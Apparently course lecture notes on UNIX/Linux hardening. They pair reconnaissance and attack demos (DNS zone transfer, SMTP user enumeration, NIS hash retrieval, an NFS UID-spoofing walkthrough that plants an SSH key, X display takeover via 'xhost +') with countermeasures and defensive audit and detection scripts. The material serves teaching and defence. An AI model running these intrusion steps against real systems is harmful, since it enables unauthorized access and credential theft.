1 ISEC0514 Computer Systems Security and Privacy Lecture Notes #8 Hardening UNIX/Linux

Dec 28, 2015

Polly Harris

UNIX Hacking

The most common goal of an attacker on a UNIX server is the root account, which controls everything on the machine.

UNIX attacks begin with the usual footprinting and enumeration steps: gathering public information, port scanning, and service-specific enumeration techniques.

Put together, this information leads to system compromise.


Gathering Public Information

Web sites: internal web sites, external web sites.

Public FTP servers.

IP address information through the whois database.

DNS: server addresses, MX records. Tools: host, nslookup, dig.

Google.

DNS Information

The request below is a zone transfer (AXFR): host -l asks the name server to list the whole zone, and -a prints the full response, which hands the attacker every host name and address in it.

    [root@test ~]# host -l -a miss.com
    Trying "miss.com"
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14233
    ;; flags: qr aa ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 0

    ;; QUESTION SECTION:
    ;miss.com.                      IN      AXFR

    ;; ANSWER SECTION:
    miss.com.               10800   IN      SOA     miss.com. admin.miss.com. ...
    miss.com.               10800   IN      NS      pentarget.miss.com.
    miss.com.               10800   IN      MX      10 pentarget.miss.com.
    ns.miss.com.            10800   IN      CNAME   pentarget.miss.com.
    pentarget.miss.com.     10800   IN      A       192.168.4.3
    pentest.miss.com.       10800   IN      A       192.168.4.2
    www.miss.com.           10800   IN      CNAME   pentarget.miss.com.
    miss.com.               10800   IN      SOA     miss.com. admin.miss.com. ...

DNS Hardening

The DNS server configuration can be hardened (BIND: /etc/named.conf): allow queries from any client, allow zone transfers only to the secondary servers, and allow recursion only to local clients. If the server is authoritative only and never resolves names on behalf of clients, set recursion no instead.

    options {
        ...
        allow-query     { any; };
        allow-transfer  { localhost; 192.168.4.4; };
        allow-recursion { localhost; 192.168.4.0/24; };
        recursion yes;
        ...
    };

DNS Hardening

Hardening result:

    [root@test nfs]# host -l -a miss.com
    Trying "miss.com"
    ; Transfer failed.
    Trying "miss.com"
    Host miss.com not found: 9(NOTAUTH)
    Received 40 bytes from 192.168.4.3#53 in 1 ms
    ; Transfer failed.
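As an added example (not from the lecture and not part of BIND), here is a small Python check that pulls the access-control lists out of the options block of a named.conf and flags the two settings the slides warn about: a zone transfer ACL that is missing or contains any, and recursion left on without an allow-recursion restriction. Both configuration fragments are constructed for the demo; the hardened one mirrors the slide, the weak one is what an unhardened server typically looks like. Older BIND releases allow transfers to anyone when allow-transfer is not set at all, so a missing directive is reported as a finding rather than treated as safe.

```python
import re

# Constructed named.conf fragments for the demo (not copied from any real server).
WEAK_CONF = """
options {
    directory "/var/named";
    allow-query { any; };
    allow-transfer { any; };
    recursion yes;
};
"""

HARDENED_CONF = """
options {
    directory "/var/named";
    allow-query     { any; };
    allow-transfer  { localhost; 192.168.4.4; };
    allow-recursion { localhost; 192.168.4.0/24; };
    recursion yes;
};
"""

# directive { element; element; ... };  -- captures the address-match list body
ACL_RE = re.compile(r'\b(allow-query|allow-transfer|allow-recursion)\s*\{([^}]*)\}')


def parse_acls(conf):
    """Return {directive: [address-match elements]} for the ACL directives found."""
    acls = {}
    for name, body in ACL_RE.findall(conf):
        acls[name] = [e.strip() for e in body.split(';') if e.strip()]
    return acls


def recursion_enabled(conf):
    """BIND treats a missing 'recursion' statement as 'recursion yes'."""
    m = re.search(r'\brecursion\s+(yes|no)\s*;', conf)
    return m is None or m.group(1) == 'yes'


def audit_named_options(conf):
    """Return a list of findings; an empty list means the two checks pass."""
    acls = parse_acls(conf)
    findings = []
    transfer = acls.get('allow-transfer')
    if transfer is None or 'any' in transfer:
        findings.append('zone transfer (AXFR) not restricted to secondaries')
    if recursion_enabled(conf):
        recursion = acls.get('allow-recursion')
        if recursion is None or 'any' in recursion:
            findings.append('recursion enabled but allow-recursion not restricted')
    return findings


if __name__ == '__main__':
    for label, conf in (('weak', WEAK_CONF), ('hardened', HARDENED_CONF)):
        print(label, audit_named_options(conf) or ['ok'])
```

The check is deliberately conservative: restricting transfers by IP address is the minimum, and secondaries that are reachable from outside should additionally be required to sign transfer requests with TSIG keys, which this parser does not look for.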

Network Enumeration

traceroute
Ping sweep
Port scanning

Traceroute

The network topology can be mapped with traceroute.

The position of the firewall can often be inferred as well: the hop at which replies stop, or the last hop before the target, is usually the filtering device.

    [bash]$ traceroute example.com
    traceroute to example.com (192.168.1.7), 30 hops max, 38 byte packets
     1  (10.1.1.1)  4.264 ms  4.245 ms  4.226 ms
     2  (10.2.1.1)  9.155 ms  9.181 ms  9.180 ms
     3  (192.168.10.90)  9.224 ms  9.183 ms  9.145 ms
     4  (192.168.10.33)  9.660 ms  9.771 ms  9.737 ms
     5  (192.168.10.217)  12.654 ms  10.145 ms  9.945 ms
     6  (192.168.11.173)  10.235 ms  9.968 ms  10.024 ms
     7  (192.168.12.97)  133.128 ms  77.520 ms  218.464 ms
     8  (192.168.13.78)  65.065 ms  65.189 ms  65.168 ms
     9  (192.168.14.252)  64.998 ms  65.021 ms  65.301 ms
    10  (192.168.100.130)  82.511 ms  66.022 ms  66.170 ms
    11  www.example.com (192.168.1.7)  82.355 ms  81.644 ms  84.238 ms

Traceroute Countermeasures

Inbound traceroute probes cannot be blocked as such, because a probe can be any kind of IP packet (UDP, ICMP echo or TCP, depending on the tool); only its TTL is special.

However, the firewall can drop outbound ICMP time-exceeded messages (ICMP type 11), which are the replies that the internal machines and routers send back to the traceroute source. Without them the attacker sees only asterisks for every hop behind the firewall.

[Diagram: the attacker's probes (any IP packets) pass through the firewall to the local machines; the firewall drops the ICMP TTL-exceeded replies on their way back out.]

Ping Sweeps

A ping sweep sends ICMP echo requests (type 8) from the outside and waits for ICMP echo replies (type 0).

A sweep can also use other ICMP request types that hosts answer, such as timestamp request (type 13), information request (type 15) and address mask request (type 17).

Tools: nmap, fping, hping2

Ping Sweeps

    [root@test static]# ./icmpenum
    USAGE: ./icmpenum [opts] [-c class C] [-d dev] [-i 1-3] [-s src] [-t sec] hosts ...
      -c class C in x.x.x.0 form
      -i icmp type to send/receive, types include the following:
         1 echo/echo reply (default)
         2 timestamp request/reply
         3 info request/reply
         4 mask request/reply
      -d device to grab local IP or sniff from, default is eth0
      -s spoofed source address
      -t time in seconds to wait for all replies (default 5)
    [root@test static]# ./icmpenum -i 2 -d eth0 -c 192.168.4.1
    192.168.4.2 is up
    192.168.4.3 is up

The sweep above uses ICMP timestamp requests (-i 2) rather than echo, so it still finds hosts on a network where only echo requests are filtered.

Ping Sweep Countermeasures

Block inbound ICMP echo requests and any other ICMP types you do not need at the perimeter. Do not block everything: ICMP destination unreachable (type 3), and in particular code 4 (fragmentation needed), is required for path MTU discovery to work.

Port Scanners and OS Detection

Port scanning tools: nmap, strobe, tcp_scan and udp_scan (part of SAINT), netcat (nc).

OS detection tools: nmap, queso.

Detecting Port Scanners

Several tools can detect port scanning activity: psad, scanlogd (TCP only), Snort.

Some of them also integrate with the host firewall so that the scanning source is blocked before it gets further. Treat that as a convenience rather than a control: an attacker can scan slowly, from many sources, or with spoofed decoy addresses that get legitimate hosts blocked.

Banner Grabbing

Banner grabbing reveals, for example, the secure shell server software and protocol version, and the mail server software and version.

Tools: telnet, netcat, amap, vmap

Banner Grabbing

    [root@test static]# telnet 192.168.4.3 22
    Trying 192.168.4.3...
    Connected to 192.168.4.3.
    Escape character is '^]'.
    SSH-2.0-OpenSSH_5.2

    Protocol mismatch.
    Connection closed by foreign host.

    [root@test static]# telnet 192.168.4.3 25
    220 relay.mut.ac.th ESMTP Sendmail 8.13.8/8.14.2; ...
    quit
    221 2.0.0 xxx.xxx.ac.th closing connection

    Connection to host lost.

FTP Enumeration

An attacker can use any FTP client to walk the directory structure of an FTP server and look for wrong permission settings.

Most anonymous FTP servers accept any string that looks like an e-mail address as the password.

If a world-writable directory is found, the attacker has a place to upload (hacking) tools to the server and can then look for a way to execute them later.

If the FTP server software has security issues, the attacker may launch an exploit against it.

A successful exploit gives the attacker a shell with the privileges of the FTP service process (for older daemons, frequently root).

SMTP Enumeration

An SMTP server can be used to gain more information about the users on the target machine.

The SMTP command VRFY confirms whether a mailbox name is valid.

EXPN expands a mailing-list name into the list of its members.

SMTP Enumeration

    [root$]telnet 10.219.100.1 25
    Trying 10.219.100.1...
    Connected to 10.219.100.1.
    Escape character is '^]'.
    220 mail.example.com ESMTP Sendmail Tue, 15 Jul 2008
    vrfy root
    250 root <[email protected]>
    expn test
    250 test <[email protected]>
    expn mailing-list
    250 .... the whole list of subscribers ...
    quit
    221 mail.example.com closing connection
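The exchange above, rewritten as an added Python model of the server side (example code, not from the lecture or from sendmail): one VRFY/EXPN handler run in the leaky configuration, which answers 250 with the mailbox, and in the hardened one, which answers 252 to VRFY (the reply RFC 5321 recommends when a server will not confirm addresses) and 502 to EXPN. The user set, the list name and the domain mail.example.com are constructed for the demo. On a real sendmail the hardened behaviour comes from O PrivacyOptions=novrfy,noexpn (or goaway) in sendmail.cf; Postfix does not implement EXPN and takes disable_vrfy_command = yes.

```python
# Constructed directory for the demo: local users and one mailing list.
USERS = {"root", "test", "admin"}
LISTS = {"mailing-list": ["admin", "test"]}
DOMAIN = "mail.example.com"   # assumed host name, matching the slide's banner


class SmtpDirectory:
    """Minimal handler for the VRFY/EXPN part of an SMTP session (no delivery)."""

    def __init__(self, expose_users):
        self.expose_users = expose_users   # True = leaky configuration

    def handle(self, line):
        """Return the reply lines for one client command."""
        parts = line.strip().split(None, 1)
        verb = parts[0].upper() if parts else ""
        arg = parts[1].strip() if len(parts) > 1 else ""
        if verb == "VRFY":
            return self._vrfy(arg)
        if verb == "EXPN":
            return self._expn(arg)
        if verb == "QUIT":
            return [f"221 2.0.0 {DOMAIN} closing connection"]
        return ["500 5.5.1 Command unrecognized"]

    def _vrfy(self, name):
        if not self.expose_users:
            # 252 neither confirms nor denies the mailbox (RFC 5321, section 3.5.3)
            return ["252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery"]
        if name in USERS:
            return [f"250 {name} <{name}@{DOMAIN}>"]
        return [f"550 5.1.1 {name}... User unknown"]

    def _expn(self, name):
        if not self.expose_users:
            return ["502 5.5.1 Command not implemented"]
        members = LISTS.get(name)
        if members is None:
            return [f"550 5.1.1 {name}... User unknown"]
        # Multi-line reply: every line but the last uses "250-" as the separator
        lines = [f"250-{m} <{m}@{DOMAIN}>" for m in members]
        lines[-1] = lines[-1].replace("250-", "250 ", 1)
        return lines


def enumerate_users(server, candidates):
    """What the attacker learns: names the server confirmed with a 250 to VRFY."""
    found = []
    for name in candidates:
        reply = server.handle(f"VRFY {name}")
        if reply[0].startswith("250"):
            found.append(name)
    return found


if __name__ == "__main__":
    for label, server in (("leaky", SmtpDirectory(True)), ("hardened", SmtpDirectory(False))):
        print(label, enumerate_users(server, ["root", "oracle", "admin"]))
        print(label, server.handle("expn mailing-list"))
```

Note that disabling VRFY only removes the cheap path: an attacker can still probe names with RCPT TO and watch for 550 versus 250, so the mail server should give the same reply for unknown and known recipients until after DATA, or rate-limit per client.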

TFTP Enumeration

Trivial File Transfer Protocol (TFTP) is a UDP-based protocol for unauthenticated "quick and dirty" file transfers.

TFTP runs on UDP port 69. It is commonly used to transfer the ROM images of network devices and to back up and restore their configurations.

A device configuration can hold information valuable to the attacker, such as passwords or password hashes of the network devices.

Since TFTP has no authentication at all, block TFTP requests from everything except the trusted addresses that need it, and do not leave device configurations on the TFTP server longer than necessary.

Finger Enumeration

On old UNIX servers the finger service may still be running.

The attacker may obtain the list of logged-in users as well as valid user names.

Finger is no longer common on modern UNIX. The example below queries the finger port of a network device, which reports its active terminal lines:

    [root$]finger [email protected][192.168.202.34]
    Line     User      Host(s)    Idle    Location
    * 2 vty 0          idle       0       192.168.202.14

RPC Enumeration

Every RPC-based service registers itself with the RPC port mapper, commonly called rpcbind or portmapper, which listens on TCP and UDP port 111.

Common RPC services include NIS and NFS.

The rpcinfo command queries the port mapper and enumerates the available services, their versions and the ports they listen on.

RPC Enumeration

    [root@test static]# rpcinfo -p 192.168.4.3
       program vers proto   port  service
        100000    4   tcp    111  portmapper
        100000    4   udp    111  portmapper
        100024    1   udp  50626  status
        100024    1   tcp  34440  status
        100011    2   udp    875  rquotad
        100011    2   tcp    875  rquotad
        100021    4   udp  51211  nlockmgr
        100021    4   tcp  49851  nlockmgr
        100003    3   tcp   2049  nfs
        100003    4   tcp   2049  nfs
        100003    3   udp   2049  nfs
        100003    4   udp   2049  nfs
        100005    2   udp  47214  mountd
        100005    2   tcp  46771  mountd
        100005    3   udp  47214  mountd
        100005    3   tcp  46771  mountd

R-cmd Enumeration

The r-commands were used in traditional UNIX for remote administration tasks.

Authentication is controlled by a configuration file called .rhosts in the home directory of the target user (and system-wide by /etc/hosts.equiv).

A common misconfiguration is a lone plus sign (+) in the .rhosts file: it allows every machine to log in as that user without a password, and "+ +" allows every user on every machine to do so.

The r-commands are rexec, rsh, rlogin and rcp. They are not common on modern UNIX; SSH should be used as the replacement.

R-cmd Enumeration

    hammer$ cat .rhosts
    gryphon.csi.cam.ac.uk
    oneeye.csi.cam.ac.uk

    gryphon$ rlogin hammer.thor
    Last login: Mon Oct 11 13:10:02 from gryphon.csi.cam.ac.uk
    Solaris Release 2.5 [hammer]
    Linux Redhat Release 4.2
    hammer$

    gryphon$ rsh -l rjd4 hammer.thor.cam.ac.uk uname -n
    hammer.thor.cam.ac.uk

NIS Enumeration

NIS data can be retrieved with the ypcat and ypmatch commands.

NIS maps can be read remotely, but the attacker needs to know the NIS domain name. Note that the passwd map carries the password hashes, so anyone who can bind to the domain can take them away for offline cracking:

    [root@pentarget ~]# nisdomainname
    miss
    [root@pentarget ~]# ypcat passwd
    testnis1:!!:1001:1001::/home/testnis1:/bin/bash
    test1:!!:501:501::/home/test1:/bin/bash
    admin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash
    [root@pentarget ~]# ypmatch admin passwd
    admin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash
    [root@pentarget ~]#

Hardening NIS

Configure the securenets file of ypserv (/var/yp/securenets on Linux) to allow NIS access only from the NIS client machines.

Make the NIS domain name hard to guess (and different from the DNS domain name).

Note that the NIS domain name is trivial to find once you can log into any NIS client machine, so it is not a secret you can rely on.
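An added Python helper (not part of the lecture or of ypserv) that reads a securenets file in ypserv's format, one netmask/network pair per line with host as shorthand for a single address, and answers the question the slide raises: would this client be allowed to bind? It also flags the entry that quietly reopens the server to everybody. The file contents and client addresses are constructed for the demo. With no securenets file at all ypserv answers every host, which is why creating the file is the first step.

```python
import ipaddress

# Constructed /var/yp/securenets for the demo: the NIS server itself plus one client LAN.
SECURENETS = """
# netmask           network
host                127.0.0.1
255.255.255.0       192.168.4.0
"""


def parse_securenets(text):
    """Parse ypserv's securenets format: 'netmask network' per line, or 'host address'."""
    nets = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        mask, addr = line.split()
        if mask == 'host':
            mask = '255.255.255.255'
        nets.append(ipaddress.IPv4Network((addr, mask), strict=False))
    return nets


def client_allowed(nets, client_ip):
    """Would ypserv answer a bind/ypcat request from this client address?"""
    ip = ipaddress.IPv4Address(client_ip)
    return any(ip in net for net in nets)


def audit_securenets(text):
    """Findings: no entries at all (everyone allowed) or a catch-all 0.0.0.0/0 entry."""
    nets = parse_securenets(text)
    if not nets:
        return ['no entries: ypserv allows every host']
    return [f'entry {net} allows every host' for net in nets if net.prefixlen == 0]


if __name__ == '__main__':
    nets = parse_securenets(SECURENETS)
    for ip in ('192.168.4.2', '10.0.0.5'):
        print(ip, 'allowed' if client_allowed(nets, ip) else 'denied')
    print(audit_securenets('0.0.0.0 0.0.0.0\n'))
```

securenets is an address filter, nothing more: a client inside the allowed network still gets the whole passwd map, hashes included, so the filter complements rather than replaces moving the hashes out of NIS (shadow maps, or retiring NIS for LDAP with Kerberos).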

NFS Enumeration

NFS exports can be listed remotely with the showmount command.

NFS access control, by default (AUTH_SYS), is checked against the IP address of the NFS client machine.

If the address is trusted, any UID and GID supplied by the client are trusted by the server too. The one exception is UID 0, which the server maps to the anonymous user (root_squash) unless the export explicitly says no_root_squash.

Any misconfiguration of the NFS exports may therefore lead to system compromise.

nfsshell is another tool that talks to the NFS server directly, without mounting anything.

NFS Attacks

    [root@pentarget ~]# cat /etc/exports
    /home   *(rw)
    /mnt    pentarget.miss.com(rw)
    /usr    *(ro)

    [root@pentest static]# showmount -e 192.168.4.3
    Export list for 192.168.4.3:
    /usr  *
    /home *
    /mnt  pentarget.miss.com

NFS Attacks

The attacker mounts the world-exported /home, sees that test1's home directory is owned by UID 501, creates a local user with that UID, and, because the server trusts whatever UID the client presents, can write into the directory and plant an SSH key:

    [root@pentest ~]# mount 192.168.4.3:/home /mnt
    [root@pentest ~]# ls -l /mnt
    total 12
    drwx------. 26 admin admin 4096 2010-02-18 16:05 admin
    drwx------.  6   501   501 4096 2010-02-16 15:22 test1
    [root@pentest ~]# useradd -u 501 hoho
    [root@pentest ~]# id hoho
    uid=501(hoho) gid=501(hoho) groups=501(hoho)
    [root@pentest ~]# su - hoho
    [hoho@pentest ~]$ cd /mnt/test1
    [hoho@pentest test1]$ mkdir .ssh
    [hoho@pentest test1]$ cd .ssh
    [hoho@pentest .ssh]$ cp ~/.ssh/id_rsa.pub authorized_keys
    [hoho@pentest .ssh]$ chmod 644 authorized_keys
    [hoho@pentest .ssh]$ chmod 700 .

NFS Attacks

    [hoho@pentest .ssh]$ ls -la
    total 12
    drwx------. 2 hoho hoho 4096 2010-02-18 17:29 .
    drwx------. 7 hoho hoho 4096 2010-02-18 17:28 ..
    -rw-r--r--. 1 hoho hoho  403 2010-02-18 17:29 authorized_keys
    [hoho@pentest .ssh]$ ssh-agent
    SSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;
    SSH_AGENT_PID=2819; export SSH_AGENT_PID;
    echo Agent pid 2819;
    [hoho@pentest .ssh]$ SSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;
    [hoho@pentest .ssh]$ SSH_AGENT_PID=2819; export SSH_AGENT_PID;

NFS Attacks

    [hoho@pentest .ssh]$ ssh-add
    Enter passphrase for /home/hoho/.ssh/id_rsa:
    Identity added: /home/hoho/.ssh/id_rsa (/home/hoho/.ssh/id_rsa)
    [hoho@pentest .ssh]$ ssh -l test1 192.168.4.3
    ...
    Last login: Tue Feb 16 15:24:27 2010 from 192.168.4.2
    [test1@pentarget ~]$ id
    uid=501(test1) gid=501(test1) groups=501(test1)

The attacker now has a shell as test1 on the NFS server without ever learning the password.

Hardening NFS

Only export file systems to trusted machines (named hosts or networks, never *).
Export file systems read-only if possible.
Use root ownership for exported files and directories: root is squashed by default, so a client that forges UID 0 cannot modify them (keep root_squash on and never add no_root_squash).
Do not export the server's executables.
Always run showmount -e against the server to double-check that the exports are what you intended.
Do not allow users to log into the NFS server.
Use TCP wrappers (hosts.allow and hosts.deny entries for rpcbind and mountd) to block NFS access, if possible.
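The attack on the preceding slides and the hardening list above, as one added Python model (example code, not from the lecture or from nfs-utils): parse_exports reads an /etc/exports table, access decides whether a given client may mount a path and which UID the server will actually act on, with root_squash applied by default and all_squash honoured, and audit_exports reports the two findings that matter most, read-write exports to every host and no_root_squash. The weak table is the one on the slide; the hardened table and the host names and addresses used to query it are constructed. Matching is simplified to first entry in file order; real mountd prefers single hosts over networks over wildcards.

```python
import fnmatch
import ipaddress

# The export table from the slide, plus a constructed hardened version.
EXPORTS_WEAK = """
/home   *(rw)
/mnt    pentarget.miss.com(rw)
/usr    *(ro)
"""

# Assumed hardened table: only one named admin workstation may mount /home read-write.
EXPORTS_HARDENED = """
/home   192.168.4.10(rw,sync,root_squash)
/usr    192.168.4.0/24(ro,sync)
"""

ANON_UID = 65534  # Linux default anonuid used by root_squash and all_squash


def parse_exports(text):
    """Return [(path, [(client_spec, {option, ...}), ...]), ...]."""
    table = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        entries = []
        for spec in clients:
            if '(' in spec:                      # host(opt,opt)
                host, opts = spec[:-1].split('(', 1)
                options = {o for o in opts.split(',') if o}
            else:                                # bare host: all defaults
                host, options = spec, set()
            entries.append((host, options))
        table.append((path, entries))
    return table


def client_matches(spec, hostname, ip):
    """Does an exports client spec (host, IP, CIDR, wildcard or *) cover this client?"""
    if spec == '*':
        return True
    if '/' in spec:
        return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)
    if '*' in spec or '?' in spec:
        return fnmatch.fnmatchcase(hostname, spec)
    return spec in (hostname, ip)


def effective_uid(options, presented_uid):
    """AUTH_SYS: the server believes the UID the client sends, except for squashing."""
    if 'all_squash' in options:
        return ANON_UID
    if presented_uid == 0 and 'no_root_squash' not in options:
        return ANON_UID                          # root_squash is the default
    return presented_uid


def access(table, path, hostname, ip, presented_uid):
    """Return ('rw' | 'ro', effective_uid) or None if the client cannot mount path."""
    for export_path, entries in table:
        if export_path != path:
            continue
        for spec, options in entries:
            if client_matches(spec, hostname, ip):
                mode = 'rw' if 'rw' in options else 'ro'   # ro is the default
                return mode, effective_uid(options, presented_uid)
    return None


def audit_exports(table):
    findings = []
    for path, entries in table:
        for spec, options in entries:
            if spec == '*' and 'rw' in options:
                findings.append(f'{path}: read-write export to every host ({spec})')
            if 'no_root_squash' in options:
                findings.append(f'{path}: no_root_squash lets client root act as server root ({spec})')
    return findings


if __name__ == '__main__':
    weak = parse_exports(EXPORTS_WEAK)
    # the attack from the slides: pentest (192.168.4.2) presents UID 501 against /home
    print(access(weak, '/home', 'pentest.miss.com', '192.168.4.2', 501))
    print(audit_exports(weak))
    print(access(parse_exports(EXPORTS_HARDENED), '/home', 'pentest.miss.com', '192.168.4.2', 501))
```

The model makes the slide's point concrete: on the weak table the attacker's machine gets rw on /home as UID 501, and only its forged UID 0 is turned into 65534; on the hardened table the same machine cannot mount /home at all, because restricting the client list is what stops the attack, not the squashing.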

X-Windows Security

An X Window System server grants a connected client many privileges, including: capturing keystrokes, killing windows, capturing window contents, and remapping keyboard keys.

The simplest X access control is xhost authentication, which is host (IP) based. Many users simply type "xhost +", which disables access control entirely: anyone who can reach the X server (TCP port 6000 plus the display number, or the local socket) can connect to it. Prefer per-user cookie authentication (xauth with MIT-MAGIC-COOKIE-1), and do not let the X server listen on TCP at all unless remote clients are really needed.

X-Windows Security

xscan can be used to scan a network for X servers that accept connections.

xlsclients lists all client windows on a display.
xkill kills any window.
xwd dumps a screen to a file.
xwud displays an image created by xwd.

X-Windows Security

    [testnis1@pentarget ~]$ id
    uid=1001(testnis1) gid=1001(testnis1) groups=1001(testnis1)
    [testnis1@pentarget ~]$ xlsclients
    xlsclients: unable to open display ""

    [admin@pentarget ~]$ xhost +
    Access control disabled, clients can connect from any host
    [admin@pentarget ~]$

The first attempt fails only because DISPLAY is not set in testnis1's session. Once admin has run xhost + on display :0, any user, local or remote, can attach to that display by naming it explicitly.

X-Windows Security

    [testnis1@pentarget ~]$ xlsclients -display :0.0 -l
    ...
    Window 0xe00001:
      Machine:  pentarget.miss.com
      Name:  Terminal
      Icon Name:  gnome-terminal
      Command:  gnome-terminal
      Instance/Class:  gnome-terminal/Gnome-terminal
    Window 0x4200001:
      Machine:  pentarget.miss.com
      Name:  Firefox
      Icon Name:  firefox
      Command:  firefox
      Instance/Class:  firefox/Firefox
    ...
    [testnis1@pentarget ~]$ xkill -display :0.0 -id 0x4200001
    xkill:  killing creator of resource 0x4200001

Vulnerability Mapping

After gathering security information about the server, the attacker maps it against potential vulnerabilities.

This process, called vulnerability mapping, can be done by:
Manually mapping the gathered information (software names and versions) to known vulnerabilities.
Using public and proof-of-concept exploits to test whether a vulnerability can actually be exploited.
Running vulnerability scanners to find candidate vulnerabilities, which is fast but noisy.

Vulnerability Mapping

Script kiddies simply skip the vulnerability mapping process and fire everything they have at the target.

It is common to see Windows exploits thrown at UNIX/Linux servers.

Vulnerability Mapping

A common vulnerability mapping process includes:
Perform network reconnaissance against the target system.
Map attributes such as operating system, architecture and the specific versions of listening services to known vulnerabilities and exploits.
Perform target acquisition by identifying and selecting key systems.
Enumerate and prioritize potential points of entry.

System Access

There are two types of access to a UNIX/Linux server.

Remote access is gained over the network or another communication channel.

Local access means having an actual command shell on the machine and escalating to higher privileges; attacks of this kind are usually called privilege escalation attacks.

System Access

Remote access and local access are related.

Attackers remotely exploit a vulnerability in a listening service and thereby gain local shell access.

Once shell access is obtained, the attackers are considered local on the system.

Then the attackers escalate their local privileges to root.

Brute-Force Attack

Password brute-force attacks can be conducted against several services, including: telnet, ftp, the r-commands, secure shell (SSH), POP3 and IMAP, HTTP and HTTPS, CVS and SVN.

Brute-Force Attack

Tools: Hydra, ADM-pop.c, SNMPBrute

Brute-Force Attack Countermeasures

Enforce strong passwords through a password policy.

This is done with system configuration and additional software: the cracklib library (via pam_cracklib, or pam_pwquality on newer distributions), the login configuration file (/etc/login.defs on Linux, /etc/login.conf on BSD), and PAM.

Brute-Force Attack Countermeasures

In addition to the general password strength recommendations:
Log multiple authentication failures, and actually review those logs.
Implement account lockout where possible (but beware that lockout lets an attacker deny service to legitimate users).
Disable unused services.
Use stronger authentication when possible, for example one-time passwords (OTP), public key authentication, or security tokens.
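The "log multiple authentication failures" item needs something that reads those logs. As an added example (not from the lecture), here is a Python detector run over a few constructed /var/log/secure lines in sshd's syslog format: it groups Failed password events by source address, raises an alert when a source accumulates the threshold number of failures inside the window, lists the user names that were tried, and, the part worth paging someone for, reports any Accepted login from that same source after the burst began. The year is assumed to be 2010 because syslog timestamps omit it; threshold and window are parameters.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/secure (syslog format, year omitted as on a real box).
SAMPLE_LOG = """\
Feb 18 17:30:01 pentarget sshd[2310]: Failed password for invalid user oracle from 192.168.4.2 port 51234 ssh2
Feb 18 17:30:02 pentarget sshd[2311]: Failed password for invalid user postgres from 192.168.4.2 port 51235 ssh2
Feb 18 17:30:03 pentarget sshd[2312]: Failed password for root from 192.168.4.2 port 51236 ssh2
Feb 18 17:30:04 pentarget sshd[2313]: Failed password for admin from 192.168.4.2 port 51237 ssh2
Feb 18 17:30:05 pentarget sshd[2314]: Failed password for test1 from 192.168.4.2 port 51238 ssh2
Feb 18 17:30:06 pentarget sshd[2315]: Accepted password for test1 from 192.168.4.2 port 51239 ssh2
Feb 18 17:31:10 pentarget sshd[2320]: Failed password for admin from 192.168.4.10 port 40001 ssh2
Feb 18 17:45:00 pentarget sshd[2330]: Accepted publickey for admin from 192.168.4.10 port 40002 ssh2
"""

# "Failed password for [invalid user] NAME from IP port N" / "Accepted METHOD for NAME from IP port N"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>[\d.]+) port \d+'
)


def parse_events(text, year=2010):
    """Return [(timestamp, 'Failed'|'Accepted', user, source_ip), ...]; year is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m['result'], m['user'], m['ip']))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Sources with >= threshold failures inside any window, plus what happened afterwards."""
    per_ip = defaultdict(list)
    for ts, result, user, ip in events:
        per_ip[ip].append((ts, result, user))
    alerts = {}
    for ip, evs in per_ip.items():
        evs.sort()
        fails = [e for e in evs if e[1] == 'Failed']
        for i in range(len(fails)):
            j = i                                  # widen [i, j) while inside the window
            while j < len(fails) and fails[j][0] - fails[i][0] <= window:
                j += 1
            if j - i >= threshold:
                first = fails[i][0]
                users = sorted({e[2] for e in fails[i:j]})
                # a successful login from the same source after the burst started
                success = [e[2] for e in evs if e[1] == 'Accepted' and e[0] >= first]
                alerts[ip] = {'failures': j - i, 'users': users, 'success_as': success}
                break
    return alerts


if __name__ == '__main__':
    for ip, info in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

The sample shows why the success check matters: five guesses against five different names in five seconds from 192.168.4.2, then an accepted password for test1, is a compromised account, not a locked-out one; the single failure from 192.168.4.10 followed by a normal key login is the noise the threshold is there to ignore.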

Attacks from Bad Coding

Attacks that exploit bad coding practices include: buffer overflow attacks, format string attacks, weak input validation, integer overflow and integer sign attacks, dangling pointer attacks.

Countermeasures

Always update software with security patches.
Beware of obsolete software.
Use secure coding practices.
Conduct software audits regularly.
Disable unused services.

Stack Protection

Administrators may disable stack execution to lower the chances of a successful stack overflow exploit.

This is done in OS-dependent configuration. Solaris: set noexec_user_stack=1 in /etc/system. Linux: it depends on the distribution; on current kernels a non-executable stack is the default when the CPU supports NX, complemented by address space randomization (kernel.randomize_va_space) and compiler protections such as -fstack-protector.

This does not prevent other memory corruption techniques, such as heap overflows or return-into-libc style attacks, which never execute code on the stack at all.

Generic UNIX Protection

For all UNIX machines, the following protection measures apply:
Separate the network of UNIX servers from the client network.
Use TCP wrappers.
Enable a host-based firewall, and consider what traffic should pass it; RPC traffic, for example, can stay inside the DMZ.
Enforce a password policy.
Do not share admin accounts.
Centralize logs on a log server (syslog).
Disable direct root login (except for recovery on the console).
Implement sudo, letting users perform specific tasks as root or another privileged user without sharing the root password.

Separate Server Networks

A DMZ should be implemented to separate the public-facing machines from the private ones.

Reference

Hacking Exposed, 6th edition (ISBN 9780071613743), chapters 2, 3 and 5.